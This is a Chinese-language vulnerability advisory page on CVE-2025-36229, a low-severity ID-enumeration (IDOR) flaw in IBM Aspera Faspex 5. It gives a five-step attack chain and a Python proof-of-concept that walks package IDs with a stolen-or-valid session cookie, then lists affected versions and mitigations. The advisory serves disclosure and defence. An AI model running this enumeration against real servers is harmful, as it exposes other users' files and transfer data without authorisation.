IPBUF安全漏洞报告
English
CVE-2025-36229 CVSS 3.1 低危

CVE-2025-36229: IBM Aspera Faspex 5 包标识符枚举信息泄露漏洞

披露日期: 2025-12-26
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-36229
漏洞类型
信息泄露/枚举漏洞
CVSS评分
3.1 低危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
IBM Aspera Faspex 5

相关标签

CVE-2025-36229信息泄露枚举漏洞IDORIBM Aspera Faspex访问控制绕过低危漏洞包标识符枚举

漏洞概述

CVE-2025-36229是IBM Aspera Faspex 5中存在的一个信息泄露漏洞。该漏洞影响版本5.0.0至5.0.14.1,允许经过身份验证的低权限用户通过枚举软件包标识符来获取敏感数据信息。攻击者利用此漏洞可以在未经适当授权的情况下,访问其他用户或系统的敏感数据包信息,包括可能包含的机密文件内容、传输元数据等。由于该漏洞需要身份验证,攻击门槛相对较高,但仍对数据机密性构成威胁。CVSS 3.1基础评分为3.1,属于低危级别,主要影响机密性Integrity Impact为无影响,Availability Impact也无影响。

技术细节

该漏洞属于IDOR(Insecure Direct Object Reference)类型的枚举漏洞。在IBM Aspera Faspex 5应用中,软件包(Package)的标识符采用可预测的递增序列或固定格式生成。攻击者作为经过身份验证的用户,可以遍历不同的包标识符来访问本无权访问的软件包数据。系统未对包标识符的访问权限进行充分验证,导致任意已认证用户都能枚举并获取敏感的软件包信息。攻击者可以通过API请求或Web界面接口,使用不同的package_id参数值进行探测,当返回不同于403/404的错误响应(如200状态码及数据包内容)时,即可确认存在敏感信息的泄露。此漏洞主要影响数据的机密性,攻击者无法通过此漏洞修改数据或导致服务中断。

攻击链分析

STEP 1
1. 信息收集
攻击者首先获取IBM Aspera Faspex 5的有效用户账户凭证,可以是低权限账户
STEP 2
2. 认证与会话建立
攻击者使用有效凭证登录系统,建立有效会话,获取JSESSIONID等认证cookie
STEP 3
3. 包标识符枚举
攻击者通过API接口(如/api/v1/packages/{id})遍历不同的软件包标识符,尝试访问本无权访问的软件包
STEP 4
4. 敏感信息获取
当枚举到有效且有访问权限但不属于当前用户的包ID时,系统返回200响应及数据包内容,导致信息泄露
STEP 5
5. 数据提取与利用
攻击者提取泄露的敏感数据,包括文件内容、传输元数据、发件人/收件人信息等,用于进一步攻击或情报收集

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys # CVE-2025-36229 PoC - IBM Aspera Faspex Package ID Enumeration # Target: IBM Aspera Faspex 5.0.0 - 5.0.14.1 def test_package_enumeration(target_url, session_cookie): """ Test for CVE-2025-36229: Package ID enumeration vulnerability Authenticated users can enumerate package identifiers to access sensitive data """ headers = { 'Cookie': f'JSESSIONID={session_cookie}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } # Test with sequential package IDs for package_id in range(1, 100): url = f"{target_url}/api/v1/packages/{package_id}" try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] VULNERABLE: Package ID {package_id} accessible") print(f"Response preview: {response.text[:200]}...") return True elif response.status_code == 403 or response.status_code == 404: print(f"[-] Package ID {package_id}: Access denied (ID does not exist or no permission)") else: print(f"[*] Package ID {package_id}: Status {response.status_code}") except requests.RequestException as e: print(f"[!] Request error: {e}") return False if __name__ == '__main__': if len(sys.argv) < 3: print("Usage: python cve_2025_36229_poc.py <target_url> <session_cookie>") print("Example: python cve_2025_36229_poc.py https://faspex.example.com abc123...") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] print(f"[*] Testing CVE-2025-36229 on {target}") print(f"[*] This vulnerability allows authenticated users to enumerate package IDs") vulnerable = test_package_enumeration(target, cookie) if vulnerable: print("\n[!] Target is VULNERABLE to CVE-2025-36229") print("[!] Authenticated users can enumerate package identifiers to access sensitive data") else: print("\n[+] Target appears to be PATCHED or test conditions not met")

影响范围

IBM Aspera Faspex 5 5.0.0
IBM Aspera Faspex 5 5.0.1
IBM Aspera Faspex 5 5.0.2
IBM Aspera Faspex 5 5.0.3
IBM Aspera Faspex 5 5.0.4
IBM Aspera Faspex 5 5.0.5
IBM Aspera Faspex 5 5.0.6
IBM Aspera Faspex 5 5.0.7
IBM Aspera Faspex 5 5.0.8
IBM Aspera Faspex 5 5.0.9
IBM Aspera Faspex 5 5.0.10
IBM Aspera Faspex 5 5.0.11
IBM Aspera Faspex 5 5.0.12
IBM Aspera Faspex 5 5.0.13
IBM Aspera Faspex 5 5.0.14.1

防御指南

临时缓解措施
如果无法立即升级,可采取以下临时缓解措施:1) 限制用户权限,遵循最小权限原则;2) 监控和审计API访问日志,检测异常的包ID枚举行为;3) 实施IP白名单或网络分段策略,限制对Aspera Faspex的访问来源;4) 启用双因素认证增强身份验证安全性;5) 定期检查用户账户活动,及时发现可疑行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表